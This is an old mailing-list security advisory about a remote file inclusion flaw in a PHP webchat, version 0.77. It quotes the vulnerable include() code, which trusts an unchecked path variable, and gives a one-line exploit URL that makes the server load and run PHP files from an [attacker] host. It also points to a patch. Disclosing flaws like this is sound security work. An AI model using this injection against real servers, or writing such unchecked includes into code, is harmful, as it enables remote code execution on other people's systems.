Informations : °°°°°°°°°°°°°° Version : 0.77 Website : http://www.webdev.ro Problem : File Including PHP Code/Location : °°°°°°°°°°°°°°°°°°° defines.php : ----------------------------------------------- <? if (!isset($WEBCHATPATH)) { $WEBCHATPATH = './'; } include ($WEBCHATPATH.'db_mysql.php'); include ($WEBCHATPATH.'language/english.php'); [...] ----------------------------------------------- Exploits : °°°°°°°°°° http://[target]/defines.php?WEBCHATPATH=http://[attacker]/ with : http://[attacker]/db_mysql.php and http://[attacker]/language/english.php Patch : °°°°°°° A patch can be found on http://www.phpsecure.info (-> New Version !! :)) More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/WebChat.txt frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
This archive was generated by hypermail 2b30 : Mon Mar 03 2003 - 08:05:25 PST